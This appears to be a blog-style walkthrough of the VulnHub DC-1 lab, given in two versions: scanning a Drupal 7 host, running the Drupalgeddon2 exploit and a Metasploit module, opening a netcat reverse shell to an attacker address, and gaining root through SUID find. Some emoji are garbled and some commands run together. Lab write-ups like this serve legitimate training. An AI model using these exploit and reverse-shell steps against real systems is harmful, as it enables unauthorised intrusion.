DC-1 VulnHub Walkthrough: Exploiting Drupal 7 & Privilege Escalation
DC-1 is a beginner-to-intermediate level vulnerable Linux machine designed to help penetration testers and OSCP aspirants practice enumeration, exploitation, and privilege escalation.
π₯οΈ Machine Details
- Name: DC-1
- Platform: VulnHub
- Operating System: Linux (Debian 32-bit)
- Difficulty: Beginner β Intermediate
- Goal: Gain root access & capture final flag
- Key Techniques: Drupal exploitation, SUID escalation
π Phase 1: Enumeration
Enumeration is the most important phase. Missing information here often breaks the entire attack chain.
π‘ Network Discovery
nmap -sn 192.168.29.0/24The DC-1 machine is identified at: 192.168.29.236
π Port & Service Enumeration
nmap -v -sT -sV -sC -O -A 192.168.29.236- 22/tcp β SSH
- 80/tcp β HTTP (Web Server)
- 111/tcp β RPC Bind
π Phase 2: Web Enumeration
Accessing the web service reveals a Drupal-based website.
http://192.168.29.236π οΈ Vulnerability Scanning
nikto -h http://192.168.29.236Drupal version information is leaked through server responses.
π€ robots.txt Check
http://192.168.29.236/robots.txtNo useful entries found. This step is optional but good practice.
π₯ Phase 3: Exploiting Drupal 7
Searching Exploit-DB for Drupal vulnerabilities reveals: Drupalgeddon2 (CVE-2018-7600).
searchsploit drupal 7β¬οΈ Download Exploit
wget https://www.exploit-db.com/exploits/44449π Execute Exploit
ruby 44449.rb 192.168.29.236π Phase 4: Shell Stabilization
The initial shell is unstable. A better interactive shell is required.
nc -e /bin/bash 192.168.29.228 4444Start Netcat listener on attacker machine before executing this.
π© Capturing User Flag
ls
cat flag1.txt
π Phase 5: Privilege Escalation
Privilege escalation focuses on misconfigured binaries and permissions.
π Finding SUID Binaries
find / -perm -u=s -type f 2>/dev/nullThe binary /usr/bin/find is discovered with SUID permissions.
π§ GTFOBins Exploitation
find . -exec /bin/bash -p \; -quitπ Final Flag (Root)
cd /root
ls
cat final_flag.txt
π Conclusion
- β Network enumeration with Nmap
- β Web vulnerability discovery
- β Drupal 7 RCE exploitation
- β Shell stabilization techniques
- β SUID privilege escalation using GTFOBins
OR
π§ͺ DC-1 Lab Solution β Step-by-Step Using Command Awareness Flow
This section converts the above command-awareness reference into a complete DC-1 lab solution. Each step explains why the command is used and how it advances the attack chain.
Step 1: Verify Target Is Reachable
Before scanning or exploiting, confirm the target system is alive.
ping 192.168.235.193Successful ICMP replies confirm the DC-1 machine is online.
Step 2: Identify Open Services
A basic port scan reveals exposed services that can be enumerated further.
nmap 192.168.235.193The scan reveals a web service, which becomes the primary entry point.
Step 3: Enumerate the Web Application
Once a web service is detected, directory and technology enumeration is performed.
feroxbuster --url 192.168.235.193whatweb http://192.168.235.193The output confirms the application is running Drupal 7, which is known to have critical vulnerabilities.
Step 4: Research Known Drupal 7 Vulnerabilities
Public exploit databases are reviewed to identify relevant vulnerabilities.
searchsploit drupal 7Known Drupal 7 exploits indicate a high probability of remote code execution.
Step 5: Simulate Exploitation via Framework Awareness
Exploitation frameworks are commonly used in lab environments to validate vulnerable configurations.
msfconsolesearch drupal 7use exploit/unix/webapp/drupal_drupalgshow optionsset RHOST 192.168.235.193set LHOST <attacker_ip>runStep 6: Post-Access Enumeration
After gaining access, basic system context and file locations are explored.
lsshellbash -icd /homecat flag.txtStep 7: Automated CMS Enumeration (Optional Validation)
Automated tools can validate findings and identify misconfigurations.
git clone https://github.com/SamJoan/droopescan.gitdroopescan scan --url http://192.168.235.193The scan confirms the Drupal attack surface already identified manually.
Step 8: Search for SUID Privilege Escalation Vectors
With user-level access established, the focus shifts to privilege escalation.
find / -perm -4000 2>/dev/nullThe output reveals /usr/bin/find running with SUID permissions.
Step 9: Escalate Privileges Using GTFOBins Logic
SUID-enabled binaries are checked against public references.
The find binary allows shell execution.
/usr/bin/find . -exec /bin/sh \; -quitStep 10: Confirm Root Access & Capture Final Flag
cd /rootlscat proof.txtπ§ Final Learning Summary
- β Enumeration drives the entire attack chain
- β Drupal 7 is a critical-risk CMS if unpatched
- β Frameworks validate real-world misconfigurations
- β SUID binaries are high-impact escalation vectors
- β GTFOBins is essential for Linux privilege escalation
